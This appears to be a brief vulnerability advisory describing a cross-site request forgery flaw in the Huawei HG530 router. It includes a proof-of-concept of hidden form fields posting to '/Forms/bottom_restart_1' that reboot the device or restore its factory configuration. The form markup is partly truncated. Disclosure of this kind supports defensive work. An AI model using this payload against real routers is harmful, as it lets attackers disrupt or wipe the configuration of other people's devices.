Huawei HG530 Cross Site Request Forgery

Huawei HG530 suffers from a cross site request forgery vulnerability.

MD5 | f8631158beda46624378b60bb87aa897

Multiple CSRF reboot and restore Vulnerability


The Huawei HG530 suffers from multiple CSRF vulnerability allows local
attackers to reboot the device or to restore to factory Configuration.


The vulnerability is located in form POST data parameter in
'Restart_factory' via path '/Forms/bottom_restart_1'


Security issue PoC :


id='test' >

<input type="hidden" name="defaltRomFlag" value="0">

<input type="hidden" name="defaultIpFactory" value="">

<INPUT TYPE="hidden" NAME="Restart_factory" VALUE="1">






//Change Value of 'Restart_factory' to 1 (to restore) or 0 to reboot

Related Posts